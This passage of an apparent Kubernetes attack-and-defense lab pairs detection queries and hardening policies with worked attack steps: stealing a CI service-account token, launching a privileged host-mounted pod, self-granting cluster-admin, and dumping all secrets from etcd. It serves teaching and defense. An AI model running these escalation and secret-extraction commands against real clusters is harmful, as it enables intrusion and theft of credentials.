PodName = AuditLog.objectRef.name,
Privileged = PodSpec.containers[0].securityContext.privileged,
Capabilities = PodSpec.containers[0].securityContext.capabilities
| sort by TimeGenerated desc
// KQL: Detect nsenter or chroot execution via container audit
ContainerLog
| where LogEntry has_any ("nsenter", "chroot /host", "mount --bind")
| extend PodName = extract("pod_name=([\\w-]+)", 1, LogEntry),
Command = extract("command=(.+)", 1, LogEntry)
| project TimeGenerated, PodName, ContainerID, Command, LogEntry
| sort by TimeGenerated desc
// KQL: Detect hostPath volume mounts in pod creation
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "create" and log_s has "pods"
| extend AuditLog = parse_json(log_s)
| extend Volumes = AuditLog.requestObject.spec.volumes
| mv-expand Volume = Volumes
| where isnotempty(Volume.hostPath)
| project TimeGenerated,
User = AuditLog.user.username,
Namespace = AuditLog.objectRef.namespace,
PodName = AuditLog.objectRef.name,
HostPath = Volume.hostPath.path,
MountType = Volume.hostPath.type
| sort by TimeGenerated desc
SPL Detection (Splunk)¶
// SPL: Detect privileged container creation
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=pods
| spath output=privileged path="requestObject.spec.containers{}.securityContext.privileged"
| spath output=capabilities path="requestObject.spec.containers{}.securityContext.capabilities.add{}"
| where privileged="true" OR capabilities="SYS_ADMIN"
| table _time, user.username, objectRef.namespace, objectRef.name, privileged, capabilities
// SPL: Detect container escape tools
index=kubernetes sourcetype="kube:container-logs"
| search "nsenter" OR "chroot /host" OR "/proc/1/root" OR "docker.sock"
| eval severity="CRITICAL"
| table _time, pod_name, namespace, container_name, log, severity
// SPL: Detect hostPath volume mounts
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=pods
| spath output=host_path path="requestObject.spec.volumes{}.hostPath.path"
| where isnotnull(host_path)
| eval risk=case(
host_path="/", "CRITICAL",
host_path="/var/run/docker.sock", "CRITICAL",
host_path="/etc", "HIGH",
host_path="/var/log", "MEDIUM",
1=1, "LOW"
)
| table _time, user.username, objectRef.namespace, objectRef.name, host_path, risk
| sort -risk
Defensive Measures: Preventing Container Escape¶
Prevention Controls
1. Pod Security Standards (PSS)
Enforce the restricted Pod Security Standard at the namespace level:
apiVersion: v1
kind: Namespace
metadata:
name: skyforge-prod
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/warn: restricted
2. Deny Privileged Containers (OPA/Gatekeeper)
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
name: deny-privileged
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
excludedNamespaces: ["kube-system"]
3. Drop All Capabilities
securityContext:
runAsNonRoot: true
runAsUser: 65534
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop:
- ALL
4. Deny hostPath Volumes (OPA/Gatekeeper)
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPHostFilesystem
metadata:
name: deny-host-filesystem
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
parameters:
allowedHostPaths: [] # No hostPath volumes allowed
5. Deny Docker Socket Mounts
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPHostFilesystem
metadata:
name: deny-docker-socket
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
parameters:
allowedHostPaths:
- pathPrefix: "/var/log"
readOnly: true
# /var/run/docker.sock is NOT listed — blocked by default
6. Enable Falco Runtime Monitoring
Deploy Falco as a DaemonSet with the container escape rules from this exercise.
Exercise 1 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 1.1 | Pod enumeration | Full capabilities + root user | Critical |
| 1.2 | Capability analysis | SYS_ADMIN + 37 other capabilities | Critical |
| 1.3 | Volume enumeration | Host root FS + Docker socket mounted | Critical |
| 1.4 | nsenter escape | Root shell on host node | Critical |
| 1.5 | Cross-pod pivot | All pod secrets on node accessible | Critical |
| 1.6 | Docker socket escape | Alternative escape path confirmed | Critical |
Exercise 2: RBAC Exploitation & Privilege Escalation¶
Time Estimate: 60–75 minutes
ATT&CK Mapping: T1078.004 (Valid Accounts: Cloud Accounts), T1610 (Deploy Container)
Objectives¶
- Enumerate RBAC permissions from a compromised service account
- Discover overly permissive ClusterRole bindings that allow privilege escalation
- Create a privileged pod using the service account to escalate privileges
- Escalate to cluster-admin by exploiting RBAC misconfigurations
- Access the Kubernetes API server with elevated permissions
Background¶
Kubernetes RBAC (Role-Based Access Control) is the primary authorization mechanism for the Kubernetes API. Misconfigured RBAC bindings are one of the most common pathways to cluster compromise. Service accounts that can create pods, modify RBAC, or access secrets across namespaces provide attackers with reliable escalation paths.
In this exercise, you start with the data-processor-sa service account token obtained in Exercise 1. Your goal is to escalate to cluster-admin through RBAC exploitation alone — without relying on container escape.
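Dangerous verb/resource combinations can be flagged mechanically before manual review. A hedged sketch — perms.txt is a synthetic sample mirroring the Step 2.1 output below:

```shell
# Hedged sketch: flag escalation-prone verb/resource combinations in a saved
# `auth can-i --list` dump. perms.txt is a synthetic sample for illustration.
cat > perms.txt <<'EOF'
pods        [get list watch create update patch delete]
pods/exec   [get list watch create update patch delete]
secrets     [get list]
EOF

# create pods + read secrets: attacker can mount any readable secret into a pod
if grep -Eq '^pods +\[.*create' perms.txt && grep -Eq '^secrets +\[.*(get|list)' perms.txt; then
  echo "ESCALATION PATH: create pods + read secrets"
fi
# pods/exec reaches every service-account token already mounted in the namespace
grep -Eq '^pods/exec +\[.*create' perms.txt && echo "ESCALATION PATH: pods/exec into running workloads"
# → ESCALATION PATH: create pods + read secrets
# → ESCALATION PATH: pods/exec into running workloads
```

Tools like peirates automate this triage, but knowing which combinations matter — pod creation, exec, secret reads, and RBAC write verbs — is what lets you read their output critically.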
Step 2.1: Enumerate Service Account Permissions¶
# Set up API access using the compromised service account token
$ export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ export APISERVER=https://10.96.0.1:443
$ alias k="kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify"
# What can this service account do?
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
pods [] [] [get list watch create update patch delete]
pods/exec [] [] [get list watch create update patch delete]
pods/log [] [] [get list watch create update patch delete]
services [] [] [get list watch create update patch delete]
configmaps [] [] [get list watch create update patch delete]
secrets [] [] [get list]
deployments.apps [] [] [get list watch create update patch delete]
replicasets.apps [] [] [get list watch create update patch delete]
daemonsets.apps [] [] [get list watch create update patch delete]
clusterroles.rbac.authorization.k8s.io [] [] [get list watch]
clusterrolebindings.rbac.authorization.k8s.io [] [] [get list watch]
roles.rbac.authorization.k8s.io [] [] [get list watch]
rolebindings.rbac.authorization.k8s.io [] [] [get list watch]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
Finding: Overly Permissive Service Account
The data-processor-sa service account can create pods, exec into pods, read secrets, create deployments, and read RBAC configurations across the cluster. These permissions are far broader than a data-processing workload needs; the combination of pod creation and secret read access is a classic privilege-escalation vector.
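The dangerous-combination reasoning above can be automated. A minimal sketch (the helper name and the `DANGEROUS` table are illustrative, not part of any real tool) that flags escalation-enabling verb/resource pairs in a permission listing shaped like `kubectl auth can-i --list` output:

```python
# Hypothetical RBAC audit helper: flag verb/resource combinations that
# enable privilege escalation on their own or in combination.
DANGEROUS = {
    ("pods", "create"): "can launch privileged pods",
    ("pods/exec", "create"): "can exec into running pods",
    ("secrets", "list"): "can enumerate and read secret material",
    ("clusterrolebindings", "create"): "can self-grant cluster-admin",
}

def audit_permissions(perms):
    """perms: list of (resource, [verbs]) tuples; returns list of findings."""
    findings = []
    for resource, verbs in perms:
        for verb in verbs:
            reason = DANGEROUS.get((resource, verb))
            if reason:
                findings.append(f"{resource}:{verb} -> {reason}")
    return findings

# Subset of the permissions observed for data-processor-sa in Step 2.1
observed = [
    ("pods", ["get", "list", "watch", "create", "update", "patch", "delete"]),
    ("pods/exec", ["get", "list", "watch", "create", "update", "patch", "delete"]),
    ("secrets", ["get", "list"]),
]
for finding in audit_permissions(observed):
    print(finding)
```

Running this against the Step 2.1 listing surfaces all three escalation primitives used later in this exercise.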
Step 2.2: Enumerate Existing RBAC Bindings¶
# List all ClusterRoles
$ k get clusterroles -o custom-columns=NAME:.metadata.name,RULES:.rules[*].verbs | head -20
NAME RULES
admin [*]
ci-deployer [*]
cluster-admin [*]
edit [create delete deletecollection get list patch update watch]
skyforge-developer [get list watch create update patch delete]
system:aggregate-to-admin [*]
system:aggregate-to-edit [create delete deletecollection patch update]
view [get list watch]
...
# Inspect the suspicious ci-deployer ClusterRole
$ k get clusterrole ci-deployer -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: ci-deployer
rules:
  - apiGroups: [""]
    resources: ["*"]
    verbs: ["*"]
  - apiGroups: ["apps"]
    resources: ["*"]
    verbs: ["*"]
  - apiGroups: ["rbac.authorization.k8s.io"]
    resources: ["*"]
    verbs: ["*"]
# Who is bound to ci-deployer?
$ k get clusterrolebindings -o json | jq -r '.items[] | select(.roleRef.name=="ci-deployer") | {name: .metadata.name, subjects: .subjects}'
{
  "name": "ci-deployer-binding",
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "deploy-pipeline-sa",
      "namespace": "skyforge-ci"
    }
  ]
}
Finding: CI/CD Service Account Has cluster-admin Equivalent Permissions
The ci-deployer ClusterRole has wildcard permissions (*) on all resources in the core, apps, and RBAC API groups. The deploy-pipeline-sa service account in the skyforge-ci namespace is bound to this role. Obtaining that SA's token therefore yields effectively cluster-admin access, including the ability to modify RBAC itself.
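Wildcard rules like these are easy to hunt for programmatically. A minimal sketch (helper names are illustrative) operating on ClusterRole objects shaped like `kubectl get clusterroles -o json` output:

```python
# Hypothetical audit sketch: flag ClusterRoles whose rules use wildcard
# resources or verbs — the ci-deployer pattern found in Step 2.2.
def has_wildcard(rule):
    return "*" in rule.get("resources", []) or "*" in rule.get("verbs", [])

def wildcard_roles(clusterroles):
    return [cr["metadata"]["name"]
            for cr in clusterroles
            if any(has_wildcard(r) for r in cr.get("rules", []))]

ci_deployer = {
    "metadata": {"name": "ci-deployer"},
    "rules": [
        {"apiGroups": [""], "resources": ["*"], "verbs": ["*"]},
        {"apiGroups": ["rbac.authorization.k8s.io"], "resources": ["*"], "verbs": ["*"]},
    ],
}
view = {
    "metadata": {"name": "view"},
    "rules": [{"apiGroups": [""], "resources": ["pods"],
               "verbs": ["get", "list", "watch"]}],
}
print(wildcard_roles([ci_deployer, view]))  # ['ci-deployer']
```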
Step 2.3: Steal CI/CD Service Account Token¶
# Since we can list secrets, find the CI/CD service account token
$ k get secrets -n skyforge-ci
NAME TYPE DATA AGE
default-token-xxxxx kubernetes.io/service-account-token 3 5d
deploy-pipeline-sa-token-yyyyy kubernetes.io/service-account-token 3 5d
registry-creds kubernetes.io/dockerconfigjson 1 5d
# Read the CI/CD service account token
$ k get secret deploy-pipeline-sa-token-yyyyy -n skyforge-ci -o jsonpath='{.data.token}' | base64 -d
eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_CI_DEPLOYER.REDACTED_SIGNATURE
# Store it
$ export CI_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_CI_DEPLOYER.REDACTED_SIGNATURE"
$ alias kci="kubectl --token=$CI_TOKEN --server=$APISERVER --insecure-skip-tls-verify"
# Verify escalated permissions
$ kci auth can-i --list | head -10
Resources Non-Resource URLs Resource Names Verbs
*.* [] [] [*]
[*] [] [*]
Step 2.4: Create Privileged Pod for Node Access¶
# Use the CI/CD service account to create a privileged debug pod
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
$ cat <<'EOF' | kci apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: debug-pod-attacker
  namespace: skyforge-prod
  labels:
    app: debug-tools
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
    - name: debug
      image: registry.helios.example.com/skyforge/base-image:latest
      command: ["/bin/sh", "-c", "sleep 86400"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /
        type: Directory
  nodeSelector:
    kubernetes.io/hostname: ip-10-60-1-20.ec2.internal
EOF
pod/debug-pod-attacker created
# Exec into the debug pod — now we're on Node 2
$ kci exec -it debug-pod-attacker -n skyforge-prod -- /bin/bash
root@ip-10-60-1-20:/# hostname
ip-10-60-1-20.ec2.internal
Step 2.5: Escalate to cluster-admin via RBAC Modification¶
# Since ci-deployer can modify RBAC, create a cluster-admin binding for our original SA
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
$ cat <<'EOF' | kci apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: data-processor-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: data-processor-sa
    namespace: skyforge-prod
EOF
clusterrolebinding.rbac.authorization.k8s.io/data-processor-admin created
# Now our original service account has cluster-admin!
$ k auth can-i --list | head -5
Resources Non-Resource URLs Resource Names Verbs
*.* [] [] [*]
[*] [] [*]
$ k auth can-i '*' '*' --all-namespaces
yes
Critical: cluster-admin Achieved via RBAC Chain
Attack chain: data-processor-sa (can list secrets) -> deploy-pipeline-sa token stolen from skyforge-ci namespace -> CI/CD SA has RBAC wildcard permissions -> Created new ClusterRoleBinding granting data-processor-sa cluster-admin. This is a three-hop privilege escalation using only Kubernetes API calls.
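The three-hop chain above can be modeled as a small directed graph and walked mechanically. A toy sketch (node and edge labels come from this exercise; this is an illustration, not a real attack-path tool):

```python
# Toy model of the Exercise 2 escalation chain: nodes are identities,
# edges are the API capabilities that let one identity reach the next.
from collections import deque

EDGES = {
    "data-processor-sa": [("read secrets in skyforge-ci", "deploy-pipeline-sa")],
    "deploy-pipeline-sa": [("create ClusterRoleBinding", "cluster-admin")],
}

def escalation_path(start, goal):
    """BFS from a starting identity to a target privilege level."""
    queue = deque([(start, [start])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for action, nxt in EDGES.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [f"--{action}--> {nxt}"]))
    return None

print(" ".join(escalation_path("data-processor-sa", "cluster-admin")))
```

Real tools in this space (e.g., graph-based RBAC analyzers) apply the same idea at cluster scale: enumerate identities and capability edges, then search for paths terminating in cluster-admin.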
Step 2.6: Demonstrate Post-Exploitation with cluster-admin¶
# List all secrets across ALL namespaces
$ k get secrets --all-namespaces | wc -l
19
# List all nodes
$ k get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE
ip-10-60-1-10.ec2.internal Ready control-plane 5d v1.29.2 10.60.1.10 203.0.113.40 Ubuntu 22.04
ip-10-60-1-20.ec2.internal Ready <none> 5d v1.29.2 10.60.1.20 203.0.113.43 Ubuntu 22.04
ip-10-60-1-30.ec2.internal Ready <none> 5d v1.29.2 10.60.1.30 203.0.113.44 Ubuntu 22.04
# Access secrets in kube-system namespace
$ k get secret -n kube-system
NAME TYPE DATA AGE
bootstrap-token-xxxxx bootstrap.kubernetes.io/token 6 5d
cloud-provider-config Opaque 1 5d
etcd-certs kubernetes.io/tls 3 5d
# Enumerate all service accounts
$ k get sa --all-namespaces | wc -l
23
Detection: RBAC Exploitation¶
Falco Rules¶
# Falco rule: Detect listing secrets in sensitive namespaces
- rule: List Secrets in kube-system
  desc: Non-system account listing secrets in the kube-system namespace
  condition: >
    kevt and kget
    and ka.target.resource = "secrets"
    and ka.target.namespace = "kube-system"
    and not ka.user.name in (system_users)
  output: >
    Secrets listed in kube-system by non-system user
    (user=%ka.user.name resource=%ka.target.resource ns=%ka.target.namespace)
  priority: WARNING
  tags: [k8s, rbac, secrets]
# Falco rule: Detect ClusterRoleBinding creation
- rule: ClusterRoleBinding Created
  desc: New ClusterRoleBinding created — potential privilege escalation
  condition: >
    kevt and kcreate and ka.target.resource = "clusterrolebindings"
  output: >
    ClusterRoleBinding created (user=%ka.user.name
    binding=%ka.target.name role=%jevt.value[/requestObject/roleRef/name])
  priority: CRITICAL
  tags: [k8s, rbac, privilege_escalation]
KQL Detection¶
// KQL: Detect RBAC permission enumeration
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
and AuditLog.objectRef.resource == "selfsubjectaccessreviews"
| project TimeGenerated,
User = AuditLog.user.username,
SourceIP = AuditLog.sourceIPs[0],
UserAgent = AuditLog.userAgent
| summarize EnumCount = count(), DistinctIPs = dcount(SourceIP) by User, bin(TimeGenerated, 5m)
| where EnumCount > 3
| sort by TimeGenerated desc
// KQL: Detect ClusterRoleBinding creation to cluster-admin
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
and AuditLog.objectRef.resource == "clusterrolebindings"
| extend RoleRef = AuditLog.requestObject.roleRef.name
| where RoleRef == "cluster-admin"
| project TimeGenerated,
User = AuditLog.user.username,
BindingName = AuditLog.objectRef.name,
RoleRef,
Subjects = AuditLog.requestObject.subjects,
SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc
// KQL: Detect privileged pod creation by non-system accounts
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
and AuditLog.objectRef.resource == "pods"
| extend Privileged = tobool(AuditLog.requestObject.spec.containers[0].securityContext.privileged),
    HostNetwork = tobool(AuditLog.requestObject.spec.hostNetwork),
    HostPID = tobool(AuditLog.requestObject.spec.hostPID)
| where Privileged == true or HostNetwork == true or HostPID == true
| where AuditLog.user.username !startswith "system:"
| project TimeGenerated,
User = AuditLog.user.username,
Namespace = AuditLog.objectRef.namespace,
PodName = AuditLog.objectRef.name,
Privileged, HostNetwork, HostPID
| sort by TimeGenerated desc
SPL Detection¶
// SPL: Detect ClusterRoleBinding creation to cluster-admin
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=clusterrolebindings
| spath output=role_ref path=requestObject.roleRef.name
| where role_ref="cluster-admin"
| table _time, user.username, objectRef.name, role_ref, requestObject.subjects{}.name, sourceIPs{}
// SPL: Detect cross-namespace secret access
index=kubernetes sourcetype="kube:audit"
verb=get objectRef.resource=secrets
| spath output=user path=user.username
| spath output=target_ns path=objectRef.namespace
| where NOT match(user, "^system:")
| stats count as access_count, values(target_ns) as namespaces_accessed, latest(_time) as last_seen by user
| where mvcount(namespaces_accessed) > 1
| table last_seen, user, namespaces_accessed, access_count
// SPL: Detect RBAC enumeration (auth can-i --list)
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=selfsubjectaccessreviews
| spath output=user path=user.username
| spath output=src_ip path=sourceIPs{}
| bin _time span=5m
| stats count as enum_count by _time, user, src_ip
| where enum_count > 3
| table _time, user, src_ip, enum_count
Defensive Measures: Preventing RBAC Exploitation¶
Prevention Controls
1. Principle of Least Privilege for Service Accounts
# GOOD: Minimal role for data-processor
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: data-processor-minimal
  namespace: skyforge-prod
rules:
  - apiGroups: [""]
    resources: ["configmaps"]
    verbs: ["get"]
    resourceNames: ["data-processor-config"]  # Named resources only
2. Disable Automount of Service Account Tokens
apiVersion: v1
kind: ServiceAccount
metadata:
  name: data-processor-sa
  namespace: skyforge-prod
automountServiceAccountToken: false
3. Restrict RBAC Modification
Never grant create, update, or patch on clusterrolebindings or clusterroles to non-admin service accounts:
# Use ValidatingAdmissionWebhook to block:
# - ClusterRoleBinding creation referencing cluster-admin
# - ClusterRole creation with wildcard verbs/resources
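The webhook check described above reduces to a small decision function. A minimal sketch (the allow-list and function names are hypothetical; a real deployment wraps this logic in an HTTPS endpoint that receives and returns AdmissionReview objects):

```python
# Hypothetical core of a validating webhook: deny any ClusterRoleBinding
# that references cluster-admin unless the requester is a platform admin.
ALLOWED_ADMINS = {"admin@helios.example.com"}  # illustrative allow-list

def review_binding(request):
    """request: the 'request' field of a parsed AdmissionReview.
    Returns (allowed, reason)."""
    obj = request.get("object", {})
    if obj.get("kind") != "ClusterRoleBinding":
        return True, ""
    if obj.get("roleRef", {}).get("name") != "cluster-admin":
        return True, ""
    user = request.get("userInfo", {}).get("username", "")
    if user in ALLOWED_ADMINS:
        return True, ""
    return False, "cluster-admin bindings may only be created by platform admins"

# The Step 2.5 request would be denied:
allowed, reason = review_binding({
    "object": {"kind": "ClusterRoleBinding",
               "roleRef": {"name": "cluster-admin"}},
    "userInfo": {"username": "system:serviceaccount:skyforge-ci:deploy-pipeline-sa"},
})
print(allowed, reason)
```

Policy engines such as OPA Gatekeeper or Kyverno express the same check declaratively and are the usual production choice.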
4. Use Namespace-Scoped Roles Instead of ClusterRoles
# Prefer Role + RoleBinding (namespace-scoped)
# over ClusterRole + ClusterRoleBinding (cluster-wide)
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ci-deployer-prod-only
  namespace: skyforge-prod  # Scoped to single namespace
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: deployer-role
subjects:
  - kind: ServiceAccount
    name: deploy-pipeline-sa
    namespace: skyforge-ci
5. RBAC Audit with rbac-police or kubectl-who-can
Exercise 2 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 2.1 | Permission enumeration | SA has pod create + secret read + RBAC read | High |
| 2.2 | RBAC binding enumeration | ci-deployer has wildcard permissions | Critical |
| 2.3 | Cross-namespace secret theft | CI/CD SA token accessible | Critical |
| 2.4 | Privileged pod creation | Node access via debug pod | Critical |
| 2.5 | RBAC modification | Self-granted cluster-admin | Critical |
| 2.6 | Post-exploitation | Full cluster control achieved | Critical |
Exercise 3: Secret Extraction & etcd Access¶
Time Estimate: 45–60 minutes ATT&CK Mapping: T1552.007 (Unsecured Credentials: Container API), T1552.001 (Unsecured Credentials: Credentials in Files)
Objectives¶
- Access the etcd datastore from a compromised control plane node
- Extract Kubernetes secrets directly from etcd using etcdctl
- Decode base64-encoded secrets and demonstrate the data at risk
- Understand why encryption at rest for etcd is critical
- Detect and prevent unauthorized etcd access
Background¶
etcd is the key-value store that backs the entire Kubernetes cluster state — including all Secrets, ConfigMaps, RBAC policies, and workload definitions. By default, Kubernetes stores Secrets in etcd as base64-encoded plaintext (not encrypted). An attacker who gains access to etcd can extract every secret in the cluster without going through the Kubernetes API.
In this exercise, you have escalated to the control plane node (from Exercise 1 or 2). The goal is to demonstrate direct etcd access and why encryption at rest is a must-have control.
Step 3.1: Identify etcd on the Control Plane¶
# After escaping to the control plane node (10.60.1.10)
# Locate etcd process
$ ps aux | grep etcd
root 2847 5.1 8.2 10794532 167280 ? Ssl Apr07 4:32 /usr/local/bin/etcd \
--advertise-client-urls=https://10.60.1.10:2379 \
--cert-file=/etc/kubernetes/pki/etcd/server.crt \
--client-cert-auth=true \
--data-dir=/var/lib/etcd \
--key-file=/etc/kubernetes/pki/etcd/server.key \
--listen-client-urls=https://127.0.0.1:2379,https://10.60.1.10:2379 \
--listen-peer-urls=https://10.60.1.10:2380 \
--trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
# Note the certificate locations — we need these to authenticate
$ ls -la /etc/kubernetes/pki/etcd/
total 40
drwxr-xr-x 2 root root 4096 Apr 7 08:00 .
drwxr-xr-x 3 root root 4096 Apr 7 08:00 ..
-rw-r--r-- 1 root root 1058 Apr 7 08:00 ca.crt
-rw------- 1 root root 1679 Apr 7 08:00 ca.key
-rw-r--r-- 1 root root 1159 Apr 7 08:00 healthcheck-client.crt
-rw------- 1 root root 1679 Apr 7 08:00 healthcheck-client.key
-rw-r--r-- 1 root root 1159 Apr 7 08:00 peer.crt
-rw------- 1 root root 1679 Apr 7 08:00 peer.key
-rw-r--r-- 1 root root 1159 Apr 7 08:00 server.crt
-rw------- 1 root root 1679 Apr 7 08:00 server.key
# Verify etcd is accessible
$ export ETCDCTL_API=3
$ export ETCDCTL_CACERT=/etc/kubernetes/pki/etcd/ca.crt
$ export ETCDCTL_CERT=/etc/kubernetes/pki/etcd/server.crt
$ export ETCDCTL_KEY=/etc/kubernetes/pki/etcd/server.key
$ export ETCDCTL_ENDPOINTS=https://127.0.0.1:2379
$ etcdctl endpoint health
https://127.0.0.1:2379 is healthy: successfully committed proposal: took = 2.108775ms
Step 3.2: Enumerate etcd Contents¶
# List all keys in etcd (Kubernetes stores data under /registry/)
$ etcdctl get / --prefix --keys-only | head -30
/registry/apiregistration.k8s.io/apiservices/v1.
/registry/apiregistration.k8s.io/apiservices/v1.apps
/registry/clusterrolebindings/ci-deployer-binding
/registry/clusterrolebindings/cluster-admin
/registry/clusterrolebindings/data-processor-admin
/registry/clusterrolebindings/skyforge-developer-binding
/registry/clusterroles/ci-deployer
/registry/clusterroles/cluster-admin
/registry/clusterroles/skyforge-developer
/registry/configmaps/skyforge-prod/data-processor-config
/registry/deployments/skyforge-prod/api-gateway
/registry/deployments/skyforge-prod/auth-service
/registry/deployments/skyforge-prod/report-engine
/registry/namespaces/default
/registry/namespaces/istio-system
/registry/namespaces/kube-system
/registry/namespaces/monitoring
/registry/namespaces/skyforge-ci
/registry/namespaces/skyforge-prod
/registry/namespaces/skyforge-staging
/registry/pods/skyforge-prod/data-processor
/registry/secrets/default/default-token-xxxxx
/registry/secrets/kube-system/bootstrap-token-xxxxx
/registry/secrets/kube-system/cloud-provider-config
/registry/secrets/kube-system/etcd-certs
/registry/secrets/skyforge-ci/deploy-pipeline-sa-token-yyyyy
/registry/secrets/skyforge-ci/registry-creds
/registry/secrets/skyforge-prod/auth-secrets
/registry/secrets/skyforge-prod/db-credentials
/registry/secrets/skyforge-prod/tls-certs
# Count total secrets
$ etcdctl get /registry/secrets --prefix --keys-only | wc -l
18
Step 3.3: Extract Secrets from etcd¶
# Extract the database credentials secret
$ etcdctl get /registry/secrets/skyforge-prod/db-credentials
# Output is binary protobuf — use -w fields to see structured data
$ etcdctl get /registry/secrets/skyforge-prod/db-credentials -w fields
"Key" : "/registry/secrets/skyforge-prod/db-credentials"
"Value" : "k8s\x00\n\x0f\n\x02v1\x12\x06Secret\x..."
# The stored value is protobuf-encoded, so base64-decoding alone yields binary.
# Decode it with a tool such as auger to recover the object:
$ etcdctl get /registry/secrets/skyforge-prod/db-credentials --print-value-only | auger decode -o json
{
  "apiVersion": "v1",
  "kind": "Secret",
  "metadata": {
    "name": "db-credentials",
    "namespace": "skyforge-prod"
  },
  "data": {
    "username": "c2t5Zm9yZ2VfYWRtaW4=",
    "password": "UkVEQUNURUQ=",
    "connection-string": "cG9zdGdyZXNxbDovL3NreWZvcmdlX2FkbWluOlJFREFDVEVEQDEwLjYwLjIuMTA6NTQzMi9za3lmb3JnZQ=="
  }
}
# Decode the base64 values
$ echo "c2t5Zm9yZ2VfYWRtaW4=" | base64 -d
skyforge_admin
$ echo "UkVEQUNURUQ=" | base64 -d
REDACTED
$ echo "cG9zdGdyZXNxbDovL3NreWZvcmdlX2FkbWluOlJFREFDVEVEQDEwLjYwLjIuMTA6NTQzMi9za3lmb3JnZQ==" | base64 -d
postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge
Finding: Secrets Stored in Plaintext in etcd
Kubernetes secrets are only base64-encoded — not encrypted — in etcd by default. Anyone with read access to etcd can extract every secret in the cluster. This includes database passwords, API keys, TLS private keys, OAuth client secrets, and service account tokens.
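What "base64-encoded, not encrypted" means in practice: decoding the data map of the Secret extracted above requires no key material at all. A minimal sketch (values mirror the synthetic output from Step 3.3):

```python
# Decoding a Kubernetes Secret's data map needs nothing but base64 —
# no key, no KMS call, no API-server mediation.
import base64

secret_data = {
    "username": "c2t5Zm9yZ2VfYWRtaW4=",
    "password": "UkVEQUNURUQ=",
}

decoded = {k: base64.b64decode(v).decode() for k, v in secret_data.items()}
print(decoded)  # {'username': 'skyforge_admin', 'password': 'REDACTED'}
```

With encryption at rest enabled (Step 3.5), the value stored in etcd would instead be ciphertext prefixed with a provider identifier, and this decode step would fail outside the API server.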
Step 3.4: Extract All Secrets at Scale¶
# EDUCATIONAL PSEUDOCODE — demonstrates the scope of the threat
# Extract all secrets from all namespaces in one operation
$ for key in $(etcdctl get /registry/secrets --prefix --keys-only); do
echo "=== $key ==="
etcdctl get "$key" --print-value-only | auger decode -o json 2>/dev/null | \
python3 -c "import sys,json; d=json.load(sys.stdin); [print(f' {k}: {__import__(\"base64\").b64decode(v).decode()}') for k,v in d.get('data',{}).items()]" 2>/dev/null
done
Expected Output (Synthetic — all values REDACTED):
=== /registry/secrets/skyforge-prod/auth-secrets ===
jwt-secret: REDACTED
oauth-client-secret: REDACTED
=== /registry/secrets/skyforge-prod/db-credentials ===
username: skyforge_admin
password: REDACTED
connection-string: postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge
=== /registry/secrets/skyforge-prod/tls-certs ===
tls.crt: REDACTED-CERTIFICATE-DATA
tls.key: REDACTED-PRIVATE-KEY-DATA
=== /registry/secrets/skyforge-ci/registry-creds ===
.dockerconfigjson: {"auths":{"registry.helios.example.com":{"auth":"REDACTED"}}}
=== /registry/secrets/kube-system/cloud-provider-config ===
cloud-config: REDACTED-AWS-CREDENTIALS
=== /registry/secrets/kube-system/etcd-certs ===
tls.crt: REDACTED-ETCD-CERT
tls.key: REDACTED-ETCD-KEY
ca.crt: REDACTED-ETCD-CA
Critical: Complete Secret Inventory Extracted
